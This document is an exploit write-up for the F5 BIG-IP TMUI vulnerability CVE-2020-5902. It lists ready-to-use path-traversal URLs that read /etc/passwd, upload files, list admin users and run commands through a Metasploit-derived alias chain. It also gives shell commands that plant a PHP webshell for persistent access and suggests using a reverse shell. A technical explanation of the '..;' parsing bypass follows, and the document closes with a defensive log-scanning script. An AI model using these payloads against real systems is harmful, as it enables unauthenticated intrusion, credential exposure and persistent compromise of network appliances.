RCE on F5 Big-IP (CVE-2020-5902)

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI) has a vulnerability that lets an unauthenticated user bypass authentication, read arbitrary files and execute commands.

Exploit

List files

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/etc/

Read file

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Upload file

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp

fileName={FILE_DESTINATION_PATH}&content={FILE_CONTENT}
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={FILE_DESTINATION_PATH}

{"output":"{FILE_CONTENT}\n"}

List users

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Execute commands

To execute commands, you need to create an alias and then upload your command. You can use a reverse shell to gain access to the box.

The following requests, taken from the Metasploit (MSF) module, execute the id command on the vulnerable endpoint:

https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd
https://{IP}:{PORT}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list

You can also upload a webshell to have persistent access:

mount -o remount -rw /usr; echo '{BASE64_PAYLOAD}' | /usr/bin/openssl base64 -d -out /usr/local/www/xui/common/images/bg_status.php
mount -o remount -rw /usr; echo '{PHP_PAYLOAD}' > /usr/local/www/xui/common/scripts/utility.php; mount -o remount -r /usr

Technical details

The vulnerability comes from how web servers parse URLs. Orange Tsai explained in his Black Hat USA 2018 talk how, when two different web servers in a chain parse the same path differently, a request can bypass the access checks applied by one of them. On slide 51, he shows the Jira example below, where the "..;" path traversal segment reaches the secure dashboard. The same technique applies here to the F5 TMUI.

https://jira.uberinternal.com/status/..;/secure/Dashboard.jspa
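A defender-side check for the traversal pattern described above, as an added example that is not part of the original page: it scans access-log lines, URL-decodes each request target before matching so that percent-encoded forms of the "..;" segment are not missed, and reports which TMUI workspace JSP was reached. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in combined log format (not from the original page).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 4321
203.0.113.7 - - [05/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 812
203.0.113.7 - - [05/Jul/2020:10:01:09 +0000] "GET /tmui/login.jsp/..%3B/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 900
203.0.113.9 - - [05/Jul/2020:10:02:00 +0000] "POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 200 55
198.51.100.2 - - [05/Jul/2020:10:03:00 +0000] "GET /xui/common/images/bg_status.png HTTP/1.1" 200 1200
"""

# Pull source address, method and request target out of one log line.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# The TMUI workspace pages reached through the login.jsp/..; traversal in this CVE.
WORKSPACE_RE = re.compile(r'/tmui/locallb/workspace/(?P<page>\w+\.jsp)')


def is_traversal_attempt(target):
    """True if the request path contains the '..;' segment after URL-decoding.

    Decoding twice also catches one layer of double-encoding (e.g. %252e),
    so '..%3B' and '%2e%2e;' are matched as well as the literal form.
    """
    path = target.split('?', 1)[0]
    decoded = unquote(unquote(path))
    return '..;' in decoded


def scan_log(text):
    """Return (source_ip, method, workspace_page) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not is_traversal_attempt(m['target']):
            continue
        decoded = unquote(unquote(m['target']))
        w = WORKSPACE_RE.search(decoded)
        hits.append((m['src'], m['method'], w['page'] if w else None))
    return hits


if __name__ == '__main__':
    for src, method, page in scan_log(SAMPLE_LOG):
        print(f'{src} {method} -> {page or "(unknown target)"}')
```

Matching on the raw, undecoded path would miss the third sample line, which is why the decode step comes before the comparison.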